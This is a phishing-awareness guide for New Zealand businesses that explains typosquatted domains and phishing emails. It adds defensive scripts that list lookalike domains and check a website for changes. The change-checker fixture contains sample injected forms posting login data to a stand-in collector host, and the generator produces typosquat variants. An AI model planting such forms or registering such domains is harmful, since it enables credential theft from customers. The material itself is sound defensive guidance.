Scammers run phishing campaigns often because they’re effective and cheap to run. It's easy for them to send phishing emails to 10,000 people, for example. Even if only 5% of people respond by clicking a link in the email, they’ll still have had success with 500 people.
One of the challenges with phishing is that it exploits people’s everyday behaviour. Businesses often send emails to customers asking them to:
- click on links to the business’s website
- log into their account when they get there.
Phishing scams mimic this behaviour to appear legitimate. And, whether it’s a legitimate request or a phishing attack, customers are likely to expect to do this. They'll follow the instructions they’re given, assuming the request is legitimate. But if it’s not, the scammers can:
- trick them into giving up their information or account login details, or
- install malicious software — like ransomware — on their computers.
How it works
Setting up a phishing campaign is a two-step process — the scammers need to:
- find somewhere they can host their campaign
- send phishing messages to their target audience.
Hosting a phishing campaign
Scammers like to target local websites (that use .nz domains) to make their phishing campaigns seem trustworthy. They may look for unpatched or insecure websites that they can take over.
Alternatively, the scammer could register a domain name that's similar to their target brand's. They could do this by:
- using a different top level domain, such as .org instead of .co.nz
- misspelling the brand name.
For example, if your domain name is www.likemybusiness.co.nz, a scammer could set up a new domain name like:
- www.likemybusiness.org — using the .org domain instead of .co.nz, or
- www.Iikernybusiness.co.nz — which replaces the m with an rn and still looks very similar.
Many customers wouldn’t notice a small change like this. If a scammer targeted your domain name in this way, it could cause serious problems for your customers. It could also damage your business’s reputation.
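The two tricks above (a different top-level domain, and a confusable character swap such as m for rn) can be turned into a defensive checklist: list the variants of your own domain that are worth registering or monitoring, and flag a reported sender or link domain that resembles yours. The script below is an added example and not CERT NZ's own code; the confusable table, the list of alternative TLDs, and the domain names are constructed for illustration and should be adapted to your own domain.

```python
"""Lookalike-domain helper: list the variants of your own domain that a
scammer might use, so you can register or monitor them, and flag a domain
that resembles yours.

Added example for this page, not CERT NZ's own code. The substitution
table, TLD list and domain names are constructed for illustration.
"""
import re

# Character sequences that look alike at a glance. The m -> rn swap is the
# page's example; the rest are additional common confusables (assumption).
CONFUSABLES = {
    "m": ["rn"],
    "l": ["I", "1"],
    "o": ["0"],
    "w": ["vv"],
}

# Reverse mapping used to canonicalise a label before comparison.
CANONICAL = [("rn", "m"), ("vv", "w"), ("I", "l"), ("1", "l"), ("0", "o")]

# Alternative top-level domains worth registering or watching (assumption).
ALT_TLDS = ["org", "com", "net", "nz", "org.nz", "net.nz"]


def _strip_www(domain: str) -> str:
    return re.sub(r"^www\.", "", domain.strip(), flags=re.IGNORECASE)


def tld_variants(label: str, tld: str) -> list:
    """Same brand label under other TLDs, e.g. likemybusiness.org."""
    return [f"{label}.{t}" for t in ALT_TLDS if t != tld]


def confusable_variants(label: str, tld: str) -> list:
    """One confusable substitution per variant, e.g. likernybusiness.co.nz."""
    variants = set()
    for src, replacements in CONFUSABLES.items():
        start = 0
        while (pos := label.find(src, start)) != -1:
            for rep in replacements:
                variants.add(f"{label[:pos]}{rep}{label[pos + len(src):]}.{tld}")
            start = pos + 1
    return sorted(variants)


def canonical(label: str) -> str:
    """Map confusable sequences to one spelling so 'Iikernybusiness' and
    'likemybusiness' compare equal. Substitutions run before lowercasing,
    otherwise the capital I -> l mapping would be lost."""
    for src, dst in CANONICAL:
        label = label.replace(src, dst)
    return label.lower()


def looks_like(candidate: str, brand_domain: str) -> bool:
    """True if candidate is not our own domain but its registrable label
    canonicalises to ours (covers both TLD swaps and confusable swaps)."""
    cand, brand = _strip_www(candidate), _strip_www(brand_domain)
    if cand.lower() == brand.lower():
        return False
    return canonical(cand.split(".")[0]) == canonical(brand.split(".")[0])


if __name__ == "__main__":
    brand = "www.likemybusiness.co.nz"
    print("Variants to register or monitor:")
    for v in tld_variants("likemybusiness", "co.nz") + confusable_variants("likemybusiness", "co.nz"):
        print("  ", v)
    for reported in ("www.Iikernybusiness.co.nz", "www.likemybusiness.org", "www.example.co.nz"):
        print(reported, "->", "lookalike" if looks_like(reported, brand) else "unrelated")
```

The canonicalisation is deliberately coarse: it treats any "rn" as a possible "m", so a legitimate domain containing "rn" may also match. That is acceptable for a watch list or for triaging a customer report, where a false positive only costs a manual look.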
Sending phishing emails
Once they have a place to host their campaign, the scammer can start sending out phishing emails. They'll create an email that mimics those sent by the brand they're impersonating. Then they'll send it out to the brand's customers in the hope that people will:
- respond to the email and provide their personal information to the scammer, or
- download malware onto their computers.
Many businesses use cloud-based email systems, like O365 or G Suite, so it’s important to make sure they’re protected. If a scammer got access to one of your organisation’s email accounts, they could use it to send out phishing emails. Your customers may not realise that these emails are fake.
- Research: attackers identify targets and objectives and get a list of email addresses.
- Phishing page: the attacker creates a phishing page by compromising a domain or using a similar domain name to a common brand.
- Email sent: the email targets are sent a message to trick them into visiting the website.
- Request actioned: the target enters information into the phishing page (credentials information) or is tricked into downloading malware.
- Information harvested: the attacker uses information in attacks or sells it. Attackers use malware to steal information or money, or to use the computer for other attacks.
How to protect your business against phishing attacks
You can help prevent an attack on your domain name by:
- making sure you install updates, or 'patches', to your operating systems and software. Patches don’t just add new features to your systems. They often fix security vulnerabilities too. If you don’t install patches when they’re released, scammers could exploit any known vulnerabilities to gain access to your website and host a phishing campaign
- protecting your email with multi-factor authentication. This can prevent your email account from being accessed by a scammer
- registering similar domain names to yours. When you register a domain name for your website, think about registering other, similar domain names too. It’s not expensive to do, and could stop scammers using your business to front a phishing attack
- checking your website from time to time. If you’re familiar with what’s on your site, you’ll notice if something changes when it shouldn’t. Then, if someone gains access to your website and changes it without your knowledge (to use it to host a phishing page or malware), you’ll know.
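The last point, checking your website for changes you didn't make, is easy to automate: keep a fingerprint of each page from a known-good deployment and compare it on a schedule, and additionally look for forms that submit to another host, which is what an injected phishing page typically does. The script below is an added example, not CERT NZ's own code. The page contents are constructed inline so it runs offline; in real use the current snapshot would be fetched over HTTPS and the baseline stored after each deployment.

```python
"""Periodic check that your own website's pages have not been changed
without your knowledge, e.g. to host a phishing page or malware.

Added example for this page, not CERT NZ's own code. The page bodies below
are constructed so the script runs offline; in real use the current pages
would be retrieved over HTTPS and the baseline saved after a known-good
deployment.
"""
import hashlib
import re
from typing import Dict, List
from urllib.parse import urlparse

OWN_HOST = "www.likemybusiness.co.nz"  # the page's example business domain

# Constructed known-good snapshot taken after the last deployment.
BASELINE_PAGES: Dict[str, bytes] = {
    "/": b"<html><body><h1>Welcome</h1><a href='/contact'>Contact</a></body></html>",
    "/contact": b"<html><body><form action='/contact' method='post'>...</form></body></html>",
}

# Constructed "current" snapshot: /contact now posts off-site and a new
# login page has appeared, as a compromised site used for phishing might.
CURRENT_PAGES: Dict[str, bytes] = {
    "/": BASELINE_PAGES["/"],
    "/contact": b"<html><body><form action='https://collector.example/submit' method='post'>...</form></body></html>",
    "/login-verify": b"<html><body><form action='https://collector.example/login'>Verify your account</form></body></html>",
}


def fingerprint(body: bytes) -> str:
    """SHA-256 of the raw body; any byte change shows up."""
    return hashlib.sha256(body).hexdigest()


def build_baseline(pages: Dict[str, bytes]) -> Dict[str, str]:
    """Map each path to the fingerprint of its known-good content."""
    return {path: fingerprint(body) for path, body in pages.items()}


def compare(baseline: Dict[str, str], pages: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Report paths whose content changed, appeared, or disappeared."""
    current = build_baseline(pages)
    return {
        "changed": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def external_form_targets(html: str, own_host: str) -> List[str]:
    """Form actions that submit to another host: a strong sign a page has
    been turned into a credential-collection page."""
    actions = re.findall(r"<form[^>]*\baction=['\"]?([^'\"\s>]+)", html, flags=re.IGNORECASE)
    external = []
    for action in actions:
        parsed = urlparse(action)
        if parsed.scheme in ("http", "https") and parsed.hostname \
                and parsed.hostname.lower() != own_host.lower():
            external.append(action)
    return external


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_PAGES)
    report = compare(baseline, CURRENT_PAGES)
    for kind, paths in report.items():
        for p in paths:
            print(f"{kind:8s} {p}")
    for path, body in CURRENT_PAGES.items():
        for target in external_form_targets(body.decode(), OWN_HOST):
            print(f"WARNING: {path} has a form posting to {target}")
```

Run it from a machine outside the web server (a compromised server can lie about its own files), and treat any "added" path as worth a look even when the existing pages are unchanged, since a phishing page is often dropped in a new directory rather than replacing your content.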
If your business is targeted by an attack
If you think your business is being targeted by a phishing attack, report it to CERT NZ. We’ll:
- investigate the phishing page, to understand where the web server is hosted and where the domain name is registered
- confirm whether the scammer has compromised your legitimate website, or set up a new domain name and replicated it
- try to make contact with the hosting or domain owner and have the phishing page taken down.
TIP: No matter how prepared you are, sometimes things go wrong. Knowing what to do during an attack is important — you’ll need a plan to help you get through what can be a stressful time. Check out our incident response planning guide to see how to make sure you're prepared.